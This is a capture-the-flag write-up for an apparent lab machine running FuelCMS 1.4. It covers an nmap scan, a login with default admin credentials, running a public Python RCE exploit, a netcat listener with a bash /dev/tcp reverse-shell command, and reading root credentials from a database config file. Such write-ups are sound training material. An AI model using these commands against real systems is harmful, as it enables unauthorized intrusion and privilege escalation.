Write-Up

Step-by-step guide on the approach taken to pwn the machine.

Objectives

In this machine, we are tasked with finding two specific items: user.txt and root.txt.

Reconnaissance

We start by running an nmap scan on the most common 100 ports to identify open services:

nmap -F --open <ip_victim>

The -F flag scans the top 100 common ports, and --open shows only open ports.

The scan reveals that port 80 is open. We visit the web page at:

http://<ip_victim>

We find a landing page for FuelCMS, version 1.4. Reading the configuration steps, we notice a link to the admin panel.

Upon closer inspection of the landing page, we find default admin credentials listed: admin/admin. We attempt to log in to the admin panel using these credentials and successfully gain access.

Exploitation

Once inside, the CMS seems recently installed and quite empty. Given the CMS version, we check exploit-db.com for potential vulnerabilities.

We discover three Remote Code Execution (RCE) exploits. We opt for the third one, written in Python3, as it is current and well-documented.

We copy the exploit to a file named fuel.py and run it:

python3 fuel.py -u <url_victim>

This provides a web shell running as www-data. Checking the directories, we locate user.txt and read its contents.

Privilege Escalation

The web shell does not allow us to input passwords for sudo commands, limiting our ability to escalate privileges. To overcome this, we establish a reverse shell.

We start a listener on our local machine:

nc -lnvp 4444

Then, on the victim machine, we run:

bash -c "bash -i >& /dev/tcp/<our_ip>/4444 0>&1"

To find our IP, we run ifconfig and use the IP under tun0.

With the reverse shell active, we check the FuelCMS landing page again. The database configuration file mentioned in step 2 catches our attention.

We inspect it:

cat /path/to/config/database.php

At the bottom, we find the root credentials:

username: root
password: mememe

However, trying to switch to root gives us a terminal error. We need a better shell, so we import a pseudo-terminal for full interaction:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Now we try switching to root again, and it works. We locate root.txt and read its contents.

PreviousIgniteNextTechnical Report

Last updated